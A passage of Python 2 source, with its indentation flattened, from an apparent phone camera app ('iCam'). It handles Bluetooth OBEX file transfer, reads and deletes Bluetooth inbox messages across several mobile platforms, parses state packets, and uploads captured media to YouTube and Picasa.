fOutput.close()
except:
DebugPrintErrorTrace()
return -1
# If we make it global func, then it should be passed unsentFileName, aData
def SaveFileToUnsent():
DebugPrint("Entered SaveFileToUnsent().")
if saveUnsentPackets == 0:
return
try:
fOutput = open(LOCAL_FOLDER_UNSENT_FILES + "/" + unsentFileName,
"wb")
fOutput.write(aData)
fOutput.close()
except:
DebugPrintErrorTrace()
if bluetoothRecipientAddress not in bluetoothServerOPPServicePort:
# Check again if the server is on.
BluetoothClientDiscoverServer()
if bluetoothRecipientAddress not in bluetoothServerOPPServicePort:
DebugPrint("BluetoothUploadBinaryData(): bluetooth server does " \
"not run OPP (OBEX Push Profile) service. Bailing " \
"out after saving file to Unsent.")
"""
# Requires backslashes, otherwise btsocket.bt_obex_send_file gives
# exception: error: (22, 'Invalid argument')
tmpPathFileNameWithBackslashes = tmpPathFileName.replace("/", "\\")
MoveFileBetweenAnyDrives(tmpPathFileNameWithBackslashes,
LOCAL_FOLDER_UNSENT_FILES + "/" + fileName)
"""
# Erase the file that failed to be sent via BT.
if os.path.isfile(tmpPathFileName):
"""
This is not necessary if MoveFileBetweenAnyDrives() is
successful.
"""
try:
if deviceId not in [IMEI_E7, IMEI_WinOS]:
#if deviceId != IMEI_E7:
os.unlink(tmpPathFileName)
except:
DebugPrintErrorTrace()
#sys.stdout.flush()
SaveFileToUnsent()
return -1
DebugPrint("BluetoothUploadBinaryData(): Calling " \
"bt_obex_send_file(bluetoothRecipientAddress = %s, " \
"bluetoothServerOPPServicePort[...] = %s, tmpPathFileName = %s)." % \
(bluetoothRecipientAddress,
str(bluetoothServerOPPServicePort[bluetoothRecipientAddress]),
tmpPathFileName))
resFunc = 0
if SYMBIAN_OS:
tmpPathFileNameWithBackslashes = tmpPathFileName.replace("/", "\\")
for i in range(NUM_RETRIES_SEND_VIA_BT):
try:
"""
Requires backslashes, otherwise btsocket.bt_obex_send_file
gives exception: error: (22, 'Invalid argument')
"""
btsocket.bt_obex_send_file(bluetoothRecipientAddress,
bluetoothServerOPPServicePort[bluetoothRecipientAddress],
unicode(tmpPathFileNameWithBackslashes))
break
except:
DebugPrint("BluetoothUploadBinaryData(): Received exception at " \
"btsocket.bt_obex_send_file().")
DebugPrintErrorTrace()
bluetoothUploadErrorsCounter += 1
# Do an "exponential backoff" time interval wait
SleepAndPetWatchdog( int(0.1 * (2**i)) )
else:
"""
Executed only if break was not used --> we have reached this only
if we failed NUM_RETRIES_SEND_VIA_BT times.
"""
DebugPrint("We failed NUM_RETRIES_SEND_VIA_BT times --> we drop " \
"this packet and save it to unsent.")
resFunc = -1
SaveFileToUnsent()
"""
MoveFileBetweenAnyDrives(tmpPathFileNameWithBackslashes,
LOCAL_FOLDER_UNSENT_FILES + "/" + fileName)
"""
"""
!!!!TODO: Do this only for error:
(12, 'Not enough space'), then restart phone.
Apparently?? on Nokia 6680, when this error is received the only
way to recover is to restart phone (or application!!!!).
"""
if deviceId == IMEI_6680:
if bluetoothUploadErrorsCounter >= 15:
BluetoothClientDiscoverServer()
BluetoothClientInitializeInbox()
if len(bluetoothServerOPPServicePort.items()) > 0:
#if bluetoothServerOPPServicePort != -1:
RestartPhone()
#elif ANDROID_OS: #!!!!TODO
# Erase the file sent via BT.
if os.path.isfile(tmpPathFileName):
# This is not necessary if MoveFileBetweenAnyDrives() was used.
try:
if deviceId not in [IMEI_E7, IMEI_WinOS]:
os.unlink(tmpPathFileName)
except:
DebugPrintErrorTrace()
#sys.stdout.flush()
"""
if MY_DEBUG_STDOUT:
appuifw.note(u"BluetoothUploadBinaryData(): sent %d bytes." % \
len(aDataBT), "info")
"""
DebugPrint("BluetoothUploadBinaryData(): sent to %s %d bytes; " \
"resFunc = %d." % \
(bluetoothRecipientAddress, len(aDataBT), resFunc))
return resFunc
# bluetoothClientTimer = e32.Ao_timer()
"""
If fileName is None, then aData is a text message (.txm).
Otherwise, it is a state and media file (.smf).
"""
def BluetoothUploadGZippedData(bluetoothRecipientAddress, aData,
fileName, newMode=False):
global bluetoothClientTimer
global address #, services
global deviceId
DebugPrint("BluetoothUploadGZippedData(bluetoothRecipientAddress=%s, " \
"aData, fileName=%s, newMode=%d)" % \
(bluetoothRecipientAddress, \
fileName, newMode))
try:
"""
DebugPrint("Entered BluetoothUploadGZippedData(" \
"bluetoothRecipientAddress = %s, fileName = %s)." % \
(bluetoothRecipientAddress, fileName))
"""
if newMode:
# For CMD messages we do NOT add the header
if fileName == COMMANDS_FILENAME:
aData = AddPacketHeader(aData)
#pass
# For TEXT and FIL messages we add the header
elif (fileName is None) or \
fileName.endswith(EXTENSION_ARBITRARY_FILE):
aData = AddPacketHeader(aData)
# For BT SMF messages we add footer
else:
#aData = aData + struct.pack(deviceIdFormat, deviceId)
aData = AddPacketHeader(aData, footer=True)
else:
# """
# add deviceId identifier in front of aData
# aData = struct.pack("100s", deviceId) + aData
aData = AddPacketHeader(aData)
"""
We gzip the data to reduce amount of data uploaded - usually
good for energy reduction.
!!!!We should actually specify in the iCam packet if the file is
encoded or not!!!!
"""
if newMode == False:
aData = aData.encode("zlib")
return BluetoothUploadBinaryData(bluetoothRecipientAddress,
aData, fileName)
except:
DebugPrintErrorTrace()
return -1
# print "The address is", address
# print "The OBEX port value is", services[BT_RFCOMM_SERVICE_NAME]
# sys.stdout.flush()
#addressPair = (address, services[BT_RFCOMM_SERVICE_NAME])
# Reconnecting to the server, etc.
#bluetoothClientTimer.after(1, BluetoothClient)
#BluetoothClientDiscoverServer()
#bluetoothClientTimer.after(1, BluetoothUploadGZippedDataWrapper(aData))
return 0
"""
BluetoothUploadGZippedDataWrapper = lambda myData: (lambda :
BluetoothUploadGZippedData(myData))
"""
"""
btMsgId is a string for ANDROID_OS, and an integer for SYMBIAN_OS.
"""
counterErrorsDeleteBluetoothMessage = 0
BLUETOOTH_INBOX_PATH = None
if ANDROID_OS:
BLUETOOTH_INBOX_PATH = "/mnt/sdcard/bluetooth"
if not os.path.exists(BLUETOOTH_INBOX_PATH):
BLUETOOTH_INBOX_PATH = "/bluetooth" #!!!!TODO: think better
elif SYMBIAN_OS:
if SYMBIAN_3:
BLUETOOTH_INBOX_PATH = "E:/Received files"
# This is case for E7. What about others: e.g., N8 - can it be on C:?
else:
BLUETOOTH_INBOX_PATH = None
elif RASPBIAN_OS:
BLUETOOTH_INBOX_PATH = "/home/pi/bluetooth_files/"
#PATH_DELIMITER = "/"
#PATH_DELIMITER = "\\"
"""
putInErrorFolderIfPossible works only where BT messages are DIRECTLY
accessible via the FS (Symbian 3+, Android, NOT Symbian 2nd ed).
"""
def BluetoothDeleteMessage(btMsgId, putInErrorFolderIfPossible=False):
global counterErrorsDeleteBluetoothMessage, bluetoothInbox
if ANDROID_OS or SYMBIAN_3 or WINDOWS_OS or RASPBIAN_OS:
DebugPrint("Entered BluetoothDeleteMessage(btMsgId=%s)." % str(btMsgId))
#return
try:
if putInErrorFolderIfPossible:
btInboxSentToiCamPath = BLUETOOTH_INBOX_PATH + "/BTMessagesError"
else:
#btInboxSentToiCamPath = BLUETOOTH_INBOX_PATH + "/BTMessagesSent"
btInboxSentToiCamPath = BLUETOOTH_INBOX_PATH + "/BTMessagesDone" #"/BTMessagesDeleted"
if not os.path.exists(btInboxSentToiCamPath):
os.makedirs(btInboxSentToiCamPath)
srcPathFileName = BLUETOOTH_INBOX_PATH + "/" + btMsgId
destPathFileName = btInboxSentToiCamPath + "/" + btMsgId
if False: #True:
MoveFileBetweenAnyDrives(srcPathFileName, destPathFileName)
else:
os.unlink(srcPathFileName)
except:
DebugPrintErrorTrace()
elif SYMBIAN_OS:
DebugPrint("Entered BluetoothDeleteMessage(btMsgId=%d)." % btMsgId)
try:
"""
From Logs\Nokia6680\2011_07_07_2\stderr_2011_07_07_11_46_01.txt:
"SymbianError: [Errno -14] KErrInUse"
"""
bluetoothInbox.delete(btMsgId)
except:
counterErrorsDeleteBluetoothMessage += 1
if counterErrorsDeleteBluetoothMessage == 3:
DebugPrint("BluetoothDeleteMessage(): " \
"counterErrorsDeleteBluetoothMessage = %d --> " \
"restarting phone." % \
counterErrorsDeleteBluetoothMessage)
RestartPhone()
"""
!!!!If we receive
"SymbianError: [Errno -14] KErrInUse"
(see http://mobile-revival.110mb.com/ReVival/N95N95N95N95N95/FromPhone/stderr_2011_06_13_10_02_41.txt)
try to Quit() or restart phone.
"""
DebugPrintErrorTrace()
def GetBluetoothMessageName(btMsgId):
if ANDROID_OS or RASPBIAN_OS:
#pathFileNameBluetoothMessage = BLUETOOTH_INBOX_PATH + "/" + btMsgId
res = str(btMsgId)
elif SYMBIAN_OS:
if SYMBIAN_3:
#pathFileNameBluetoothMessage = BLUETOOTH_INBOX_PATH + "/" + btMsgId
res = str(btMsgId)
else: #(S60_EDITION[0] < 3):
#pathFileNameBluetoothMessage = BLUETOOTH_INBOX_PATH + "/" + btMsgId
"""
description(btMsgId) returns the name of the file from the BT
message.
"""
res = str(bluetoothInbox.description(btMsgId))
elif WINDOWS_OS:
res = str(btMsgId)
return res
def GetBluetoothMessagePathFileName(btMsgId):
if ANDROID_OS:
res = BLUETOOTH_INBOX_PATH + "/" + btMsgId
#res = btMsgId
elif RASPBIAN_OS:
res = BLUETOOTH_INBOX_PATH + "/" + btMsgId
elif WINDOWS_OS:
res = BLUETOOTH_INBOX_PATH + "/" + btMsgId
elif SYMBIAN_OS:
if SYMBIAN_3:
res = BLUETOOTH_INBOX_PATH + "/" + btMsgId
#res = btMsgId
elif S60_EDITION[0] >= 3:
# S60 3rd-5th ed
"""
This includes (AFAIR) SYMBIAN_1 phones.
The following command gives exception KErrNotSupported on
S60 3+ edition (Symbian v9) - can't access the file
although it exists (at least when storing messages on
Mem card...) :(.
#Will not get the path on S60 3+ edition (Symbian v9).
pathFileNameBluetoothMessage = bluetoothInbox.attachment_path(btMsgId)
"""
#!!!! Here we don't have filename so we return None #the int btMsgId
res = None #btMsgId
elif S60_EDITION[0] < 3:
# For S60 2nd edition.
"""
This should work on S60 2nd edition. However, it will not get the
path on S60 3+ edition (Symbian v9) - it will generate an exception
which is normal behavior, so we choose not to report it.
"""
res = bluetoothInbox.attachment_path(btMsgId)
if res is None:
return None
return res
#def BluetoothMessageReadData(aBluetoothInbox, btMsgId):
def BluetoothMessageReadData(btMsgId):
global bluetoothInbox
btMsgData = None
DebugPrint("BluetoothMessageReadData(): btMsgId = %s." % (btMsgId))
"""
#Check that the BT message is sent by an iCam client.
if fileNameBtMsg[0 : len(BT_OBEX_FILENAME_PREFIX)]
!= BT_OBEX_FILENAME_PREFIX:
DebugPrint("BluetoothMessageProcessAndDelete(): " \
"fileNameBtMsg does not start " \
"with %s. Bailing out without processing " % \
"or erasing the message..." \
BT_OBEX_FILENAME_PREFIX)
return
"""
if ANDROID_OS or (SYMBIAN_OS and ((S60_EDITION[0] < 3) or SYMBIAN_3)) or \
WINDOWS_OS or RASPBIAN_OS:
pathFileNameBluetoothMessage = GetBluetoothMessagePathFileName(btMsgId)
DebugPrint("BluetoothMessageReadData(): " \
"pathFileNameBluetoothMessage=%s." % pathFileNameBluetoothMessage)
try:
fInput = None
fInput = open(pathFileNameBluetoothMessage, "rb")
btMsgData = fInput.read()
fInput.close()
except:
# print(repr(fileNameBtMsg))
# !!!!Alex
# print(repr(BTMessageReadFile(fileNameBtMsg)))
# Always prints "Bluetooth", presumably
# print(repr(bluetoothInbox.address(btMsgId)))
DebugPrintErrorTrace()
btMsgData = None
if fInput is not None:
try:
fInput.close()
except:
DebugPrintErrorTrace()
elif SYMBIAN_OS:
if S60_EDITION[0] >= 3:
try:
# MAX_READ_BT_MESSAGE = 512 * 1024
MAX_READ_BT_MESSAGE = 64 * 1024
sizeBluetoothMessage = bluetoothInbox.size(btMsgId)
except:
"""
Bad BT message.
I got exception for a few BT messages on N95 transmitted in
Burst (Turbo) mode from N82. In this case I simply delete
this message.
"""
DebugPrintErrorTrace()
#return ""
return None
try:
DebugPrint("BluetoothMessageReadData(): " \
"sizeBluetoothMessage = %d." % sizeBluetoothMessage)
offsetBluetoothMessage = 0
dataBluetoothMessage = []
while offsetBluetoothMessage < sizeBluetoothMessage:
numBytesToReadBtMessage = sizeBluetoothMessage - \
offsetBluetoothMessage
if numBytesToReadBtMessage > MAX_READ_BT_MESSAGE:
numBytesToReadBtMessage = MAX_READ_BT_MESSAGE
s = bluetoothInbox.data(btMsgId, offsetBluetoothMessage,
numBytesToReadBtMessage)
offsetBluetoothMessage += len(s)
dataBluetoothMessage.append(s)
btMsgData = "".join(dataBluetoothMessage)
except:
DebugPrintErrorTrace()
#return ""
btMsgData = None
if btMsgData != None:
DebugPrint("BluetoothMessageReadData(): len(btMsgData) = %d." % \
(len(btMsgData)))
return btMsgData
btMsgStateTime = None # This is updated in GetInfoFromSMFBtMsg() and used by BluetoothTimeSyncWithDrift(), etc
def GetInfoFromSMFBtMsg(stateMediaData, fileName):
global deviceIdFormat, btMsgStateTime
global statePackFormat00, statePackFormat01, statePackFormat02, \
statePackFormat03
try:
cameraId = int(fileName[len(fileName) - 5])
"""
We want the time when the movie was recorded (and
uploaded via BT on the server),
NOT the upload time of the server.
"""
#crtTime = GetCurrentDateTime()
# We get the time the file was uploaded from the state.
#statePackFormat03_1 = statePackFormat03[1:]
statePackFormat03_1 = statePackFormat03[1:] + statePackFormat03b[1:]
if NEW_BT_FORMAT:
"""
Note: we require the little endian sign "<" before the other format
strings.
"""
statePackFormatPartial = "<" + statePackFormat00[1:] + \
statePackFormat01[1:] + statePackFormat02[1:]
statePackFormatPartial2 = "<" + statePackFormat00[1:] + \
statePackFormat01[1:]
else:
"""
Note: we require the little endian sign "<" before the other
format strings
- that is why we have the "<" in the deviceIdFormat string
"""
statePackFormatPartial = deviceIdFormat + statePackFormat00[1:] + \
statePackFormat01[1:] + statePackFormat02[1:]
if NEW_BT_FORMAT:
offset = len(stateMediaData) - struct.calcsize(statePackFormat)
offset2 = len(stateMediaData) - struct.calcsize(statePackFormat)
else:
offset = 0
offset2 = 0
DebugPrint("GetInfoFromSMFBtMsg(): offset " \
"(where iCam state data begins) = %d (0x%x)" % (offset, offset))
offset += struct.calcsize(statePackFormatPartial)
offset2 += struct.calcsize(statePackFormatPartial2)
DebugPrint("GetInfoFromSMFBtMsg(): " \
"offset = %d (0x%x), offset2 = %d." % \
(offset, offset, offset2))
"""
DebugPrint("BluetoothMessageProcess:" \
"UploadBluetoothMediaToGoogle(): " \
"statePackFormat03_1 = %s, " \
"calcsize() = %d." % \
(statePackFormat03_1,
struct.calcsize(
statePackFormatPartial)))
#DebugPrint("BluetoothMessageProcess:" \
# "UploadBluetoothMediaToGoogle(): " \
# "tm_year = %s" % str(tm_year))
"""
(tm_year, tm_mon, tm_mday,
tm_hour, tm_min, tm_sec,
numMilliseconds,
btMsgStateTime, _, _) = \
struct.unpack(statePackFormat03_1,
stateMediaData[offset : offset + \
struct.calcsize(statePackFormat03_1)])
statePackFormat02_1 = statePackFormat02[1:]
btAddr = [0, 0, 0, 0, 0, 0]
(_, btAddr[0], btAddr[1], btAddr[2], btAddr[3], btAddr[4], btAddr[5],
_ , _) = struct.unpack(statePackFormat02_1,
stateMediaData[offset2 : offset2 + \
struct.calcsize(statePackFormat02_1)])
btCliendMACAddrList = ["%02X:" % e for e in btAddr]
btCliendMACAddr = "".join(btCliendMACAddrList)
btCliendMACAddr = btCliendMACAddr[: len(btCliendMACAddr) - 1]
timeTuple = (tm_year, tm_mon, tm_mday, tm_hour, tm_min, tm_sec,
numMilliseconds)
DebugPrint("GetInfoFromSMFBtMsg(): cameraId = %d, " \
"tm_year = %d, tm_mon = %d, tm_mday = %d, " \
"tm_hour = %d, tm_min = %d, tm_sec=%d, numMilliseconds=%d, " \
"btMsgStateTime = %d." % \
(cameraId,
tm_year, tm_mon, tm_mday,
tm_hour, tm_min, tm_sec, numMilliseconds,
btMsgStateTime))
offset3 = offset + struct.calcsize(statePackFormat03_1)
statePackFormatPartial += statePackFormat03_1
statePackFormat04_1 = statePackFormat04[1:]
aStr = stateMediaData[offset3 : offset3 + \
struct.calcsize(statePackFormat04)]
DebugPrint("GetInfoFromSMFBtMsg(): " \
"struct.calcsize(statePackFormat04) = %d, " \
"len(aStr) = %d." % \
(struct.calcsize(statePackFormat04), len(aStr)))
(aBatteryLevel, _, _, _, _, aChargerStatus) = \
struct.unpack(statePackFormat04, aStr)
DebugPrint("GetInfoFromSMFBtMsg(): " \
"aBatteryLevel = %d, aChargerStatus = %d." % \
(aBatteryLevel, aChargerStatus))
return (cameraId, timeTuple, btCliendMACAddr, \
aBatteryLevel, aChargerStatus)
except:
DebugPrintErrorTrace()
return None
def GetMediaFromBluetoothSMFPacket(stateMediaData):
try:
lenNonMediaData = struct.calcsize(deviceIdFormat) + \
struct.calcsize(statePackFormat)
if NEW_BT_FORMAT:
mediaData = stateMediaData[ : -lenNonMediaData]
else:
mediaData = stateMediaData[lenNonMediaData : ]
DebugPrint("GetMediaFromBluetoothSMFPacket(): " \
"len(stateMediaData) = %d, " \
"lenNonMediaData = %d, " \
"len(mediaData) = %d." % \
(len(stateMediaData), lenNonMediaData, len(mediaData)))
return mediaData
except:
DebugPrintErrorTrace()
def UploadBluetoothMediaToGoogle(stateMediaData, fileName,
fileNameExtensionList, uploadFunction, btClientDeviceId,
aBatteryLevel=-1, aChargerStatus=-1):
fileNameExtension = str.lower(fileName[len(fileName) - 4:])
#TODO!!!!!!!!: takeout this info and pass it directly to UploadBluetoothMediaToGoogle()
res = GetInfoFromSMFBtMsg(stateMediaData, fileName)
if res is None:
return
cameraId = res[0]
(tm_year, tm_mon, tm_mday,
tm_hour, tm_min, tm_sec, numMilliseconds) = res[1]
DebugPrint("Entered UploadBluetoothMediaToGoogle().")
#DebugPrint("len(fileName) =", len(fileName))
DebugPrint("UploadBluetoothMediaToGoogle(): len(stateMediaData) = %d" % \
len(stateMediaData))
if fileNameExtension in fileNameExtensionList:
DebugPrint("UploadBluetoothMediaToGoogle(): uploading.")
#DebugPrint("len(fileName) = %d" % len(fileName))
fOutput = None
try:
"""
# Unfortunately time.mktime() DOES NOT WORK ON
# PyS60 2.0. It simply crashes it without an
# exception...
#From http://www.tutorialspoint.com/python/time_mktime.htm
# The last 3 args are tm_wday, tm_yday,tm_isdst
btMediaTime = time.localtime(time.mktime(
(tm_year, tm_mon, tm_mday, tm_hour, tm_min,
tm_sec, -1, -1, -1) ))
"""
# btMediaTimeStr = "%02d:%02d:%02d.%03d " \
# "%02d-%02d-%04d" % (tm_hour, tm_min,
# tm_sec, numMilliseconds, tm_mday, tm_mon,
# tm_year)
btMediaTimeStr = "%02d:%02d:%02d.%01d %02d-%02d-%04d" % \
(
tm_hour, tm_min, tm_sec,
int((numMilliseconds + 50) / 100),
tm_mday, tm_mon, tm_year
)
btMediaDateStr = "%04d-%02d-%02d" % (tm_year, tm_mon, tm_mday)
DebugPrint("UploadBluetoothMediaToGoogle(): " \
"btMediaTimeStr = %s, btMediaDateStr = %s." % \
(btMediaTimeStr, btMediaDateStr))
#DebugPrint("len(fileName) = %d" % len(fileName))
#pathFileName = "D:/" + fileName
pathFileName = LOCAL_FOLDER_TEMP + "/" + fileName
fOutput = open(pathFileName, "wb")
mediaData = GetMediaFromBluetoothSMFPacket(stateMediaData)
DebugPrint("UploadBluetoothMediaToGoogle(): " \
"len(mediaData) = %d." % \
len(mediaData))
fOutput.write(mediaData)
# !!!!CHANGED
#!!!!!!!!!!!!!!!!!!!!!!!UNDERSTAND WHY DIDN'T I PUT close() here, but in MyThreadUploadFunction() - I'm not using fOutput in Youtube/PicassaUpload(). But I can use it in YouTubeVideoUpload() - both use FileObjectBufferWithLenForGdataMedia()
"""
fOutput.close() is required here since I read the file
in MyThreadUploadFunction() - on Nokia this was not really a problem since LOCAL_FOLDER_TEMP was a RAM drive.
!!!!If we want to avoid creating files completely, we can pass mediaData as parameter to YouTubeVideoUpload() and Picasa...Upload().
"""
fOutput.close()
"""
uploadFunction(pathFileName, fileName, \
btClientDeviceId, crtTime, \
btClientDeviceId, cameraId)
"""
def MyThreadUploadFunction():
uploadFunction(pathFileName, fileName, btClientDeviceId, None,
btMediaTimeStr, btMediaDateStr,
btClientDeviceId, cameraId,
aBatteryLevel, aChargerStatus)
if fOutput is not None:
try:
#fOutput.close()
DebugPrint("MyThreadUploadFunction(): " \
"file size uploaded = %d." % \
os.path.getsize(pathFileName))
except:
DebugPrintErrorTrace()
try:
pass
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Uncomment os.unlink() or do move
os.unlink(pathFileName)
except:
# Maybe the file got moved since
# uploading to Google failed.
DebugPrintErrorTrace()
DebugPrint("UploadBluetoothMediaToGoogle(): " \
"file size uploaded = %d." % \
os.path.getsize(pathFileName))
# This is to make the UI more responsive (on Nokia phones, etc)
MyThreadStart(MyThreadUploadFunction)
#MyThreadUploadFunction()
except IOError:
DebugPrintErrorTrace()
"""
We assume we obtain exception:
"IOError: [Errno 28] No space left on " \
"device: 'D:/2011_04_25_23_17_39_032_0.3gp'"
This is probably related to the fact YouTube
upload did not succeed and the video file
in LOCAL_FOLDER_TEMP was not erased
probably because it was hanged by the
YouTube API.
"""
RestartPhone()
except:
DebugPrintErrorTrace()
"""
# Doesn't work on Python 2.2 (e.g., PyS60 1.4.5)
finally:
try:
fOutput.close()
except:
DebugPrintErrorTrace()
try:
os.unlink(pathFileName)
except:
DebugPrintErrorTrace()
"""
def BluetoothMessageProcessTXT(btMsgId, btMsgData,
fileNameBtMsg, btClientDeviceId):
DebugPrint("BluetoothMessageProcessTXT(btMsgId = %s): Processing a text " \
"message from btClientDeviceId = %s of len(btMsgData) = %d, " \
"fileNameBtMsg = %s - saving it in the Unsent folder." % \
(btMsgId, btClientDeviceId, len(btMsgData), fileNameBtMsg))
"""
fOutput = open(LOCAL_FOLDER_MEDIA_FILES + "/" + fileNameBtMsg +\
"_before.dgb", "wb")
fOutput.write(btMsgData)
fOutput.close()
"""
try:
if NEW_BT_FORMAT:
#fileName = fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): ]
fileName = fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): \
-len(BT_OBEX_EXTENSION_TXT)] + \
EXTENSION_TEXT_MESSAGE
else:
fileName = fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX) + \
len(BT_OBEX_FILENAME_PREFIX_TYPE_TXT):] + \
EXTENSION_TEXT_MESSAGE
"""
fileName = time.strftime("%Y_%m_%d_%H_%M_%S_",
GetCurrentDateTime()) + EXTENSION_TEXT_MESSAGE
"""
DebugPrint("BluetoothMessageProcessTXT(): fileName = %s." % fileName)
if NEW_BT_FORMAT:
"""
# ~Deprecated
# We add the footer "data-link layer" packet info as header to be an Internet packet.
lenExtra = struct.calcsize(deviceIdFormat)
dataToSend = btMsgData[-lenExtra : ] + \
btMsgData[ : -lenExtra]
"""
dataToSend = btMsgData
"""
fOutput = open(LOCAL_FOLDER_MEDIA_FILES + "/" + \
fileNameBtMsg + "_after.dgb", "wb")
fOutput.write(dataToSend)
fOutput.close()
"""
"""
The packet dataToSend == btMsgData ALREADY has a
"data-link layer" 100-bytes-long header
with deviceId, followed by the "payload" text message.
Therefore to obtain a packet to send to the iCam server
we only need to zlib-compress the packet.
"""
dataToSend = dataToSend.encode("zlib")
UploadUnsentBinaryData(btClientDeviceId, fileName, dataToSend)
else:
"""
fOutput = open(pathName + "/" + fileName, "wb")
fOutput.write(btMsgData[4 : ])
fOutput.close()
"""
UploadUnsentBinaryData(btClientDeviceId, fileName, btMsgData[4:])
# bluetoothInbox.delete(btMsgId)
BluetoothDeleteMessage(btMsgId)
except:
DebugPrintErrorTrace()
def BluetoothMessageProcessFIL(btMsgId, btMsgData,
fileNameBtMsg, btClientDeviceId):
# """
DebugPrint("BluetoothMessageProcessFIL(): Processing a file message " \
"from %s - saving it in the Unsent folder." % btClientDeviceId)
# """
try:
if NEW_BT_FORMAT:
fileName = fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): ]
else:
fileName = fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX) + \
len(BT_OBEX_FILENAME_PREFIX_TYPE_TXT):] + \
EXTENSION_ARBITRARY_FILE
if NEW_BT_FORMAT:
UploadUnsentBinaryData(btClientDeviceId, fileName, btMsgData)
else:
UploadUnsentBinaryData(btClientDeviceId, fileName, btMsgData[4:])
"""
#fileName = time.strftime("%Y_%m_%d_%H_%M_%S_", \
# GetCurrentDateTime()) + EXTENSION_TEXT_MESSAGE
fOutput = open(pathName + "/" + fileName, "wb")
fOutput.write(btMsgData[4 : ])
fOutput.close()
"""
# bluetoothInbox.delete(btMsgId)
BluetoothDeleteMessage(btMsgId)
except:
DebugPrintErrorTrace()
def BluetoothMessageProcessSMF(btMsgId, btMsgData, stateMediaData,
fileNameBtMsg, btClientDeviceId,
aBatteryLevel=-1, aChargerStatus=-1):
DebugPrint(
"Entered BluetoothMessageProcessSMF(btMsgId=%s, btMsgData, " \
"stateMediaData of len %d, fileNameBtMsg=%s, btClientDeviceId=%s, " \
"aBatteryLevel=%d, aChargerStatus=%d)." % \
(btMsgId, len(stateMediaData), fileNameBtMsg, btClientDeviceId,
aBatteryLevel, aChargerStatus))
"""
fOutput = open(LOCAL_FOLDER_MEDIA_FILES + "/" + fileNameBtMsg + ".dgb", "wb")
fOutput.write(stateMediaData)
fOutput.close()
"""
try:
"""
# Write on mem card temporary file from received BT.
# We need to do this only for debugging purposes - so better
# comment all this block if not needed.
tmpPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + \
BT_OBEX_FILENAME_PREFIX + "_rcvd"
fOutput = open(tmpPathFileName, "wb")
fOutput.write(btMsgData)
fOutput.close()
"""
#ReceiveArchivedFile()
#stateMediaData = bluetoothFD.read(1000000)
#appuifw.note(u"ReceiveArchivedFile: read %d bytes." %
# (fileDataSize + 4), "info")
#fOutput = open("bla_tmp_after", "wb")
#fOutput.write(stateMediaData)
#fOutput.close()
"""
TODO!!!!: should I declare gpsInfo as global? Why am I
actually clearing gpsInfo?
gpsInfo = {"position": {}, "course": {}, "satellites": {}}
"""
"""
Since I only want to obtain fileName, I extract it directly
without unpack().
"""
if NEW_BT_FORMAT:
# We compute the offset to the fileName in the iCam state
#offset = len(stateMediaData) - struct.calcsize(statePackFormat) + 1408
"""
# These 2 cancel:
offset = len(stateMediaData) - \
struct.calcsize(statePackFormat) + \
struct.calcsize(statePackFormat) - \
struct.calcsize(statePackFormat26) - \
struct.calcsize(statePackFormat27)
"""
offsetFileName = len(stateMediaData) - \
struct.calcsize(statePackFormat26) - \
struct.calcsize(statePackFormat27) - \
struct.calcsize(statePackFormat28)
#fileName = stateMediaData[offset: offset + 256] #+ "_" + btClientDeviceId + cameraId
fileName = stateMediaData[offsetFileName: offsetFileName + \
struct.calcsize(statePackFormat26)]
else:
OFFSET_FILENAME_IN_STATE = 1408
fileName = stateMediaData[struct.calcsize(deviceIdFormat) + \
OFFSET_FILENAME_IN_STATE : struct.calcsize(deviceIdFormat) + \
OFFSET_FILENAME_IN_STATE + 256]
firstNullCharIndex = fileName.find("\x00")
fileName = fileName[0 : firstNullCharIndex]
DebugPrint("BluetoothMessageProcessSMF(): fileName " \
"(from state) = %s." % fileName)
#DebugPrint("len(fileName) = %d" % len(fileName))
"""
if not os.path.exists(LOCAL_FOLDER_UNSENT_FILES):
os.makedirs(LOCAL_FOLDER_UNSENT_FILES)
pathName = LOCAL_FOLDER + "/" + btClientDeviceId
if not os.path.exists(pathName):
os.makedirs(pathName)
pathName = LOCAL_FOLDER + "/" + btClientDeviceId + "/Unsent"
if not os.path.exists(pathName):
os.makedirs(pathName)
"""
if uploadMediaToYouTube or uploadMediaToPicasa:
"""
Note that UploadBluetoothMediaToGoogle() creates a separate thread
to handle the Google upload. This is OK, since we create the
file to be uploaded before entering the thread and delete it
in the thread, when we finish.
"""
if uploadMediaToYouTube:
UploadBluetoothMediaToGoogle(stateMediaData, fileName,
[".3gp", ".mp4"], YouTubeVideoUpload, btClientDeviceId,
aBatteryLevel, aChargerStatus) #-1, -1)
"""
SleepAndPetWatchdog(pauseIntervalGdata)
"""
if uploadMediaToPicasa:
UploadBluetoothMediaToGoogle(stateMediaData, fileName,
[".jpg", ".png"], PicasaPhotoUpload, btClientDeviceId)
"""
SleepAndPetWatchdog(pauseIntervalGdata)
"""
if not ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ:
# Store the media file from the Bluetooth received message.
pathName = LOCAL_FOLDER_MEDIA_FILES + "/" + btClientDeviceId
if not os.path.exists(pathName):
os.makedirs(pathName)
# !!!!CHANGED
# We create a new file since the one created before was in LOCAL_FOLDER_TEMP - normally no need to move the file
mediaData = GetMediaFromBluetoothSMFPacket(stateMediaData)
fOutput = open(pathName + "/" + fileName, "wb")
fOutput.write(mediaData)
fOutput.close()
if NEW_BT_FORMAT:
pass
else:
"""
if (fileName[len(fileName) - 4 : ] == ".jpg") or
(fileName[len(fileName) - 4 : ] == ".3gp"):
"""
# Could be ".3gp", ".jpg", ".png", etc.
if fileName[len(fileName) - 4] == ".":
fileName = fileName[:len(fileName) - 4] + \
EXTENSION_STATE_AND_MEDIA_FILE
lenNonMediaData = struct.calcsize(deviceIdFormat) + \
struct.calcsize(statePackFormat)
# Note that we consider the iCam server the BT proxy
if useiCamServer == 2:
if NEW_BT_FORMAT:
fileName = fileName[ : -4] + EXTENSION_STATE_AND_MEDIA_FILE
SMFData = stateMediaData[-lenNonMediaData : ] + \
stateMediaData[ : -lenNonMediaData]
"""
fOutput = open(LOCAL_FOLDER_UNSENT_FILES + "/" + fileName + "2.dbg", "wb")
fOutput.write(SMFData)
fOutput.close()
"""
SMFData = SMFData.encode("zlib")
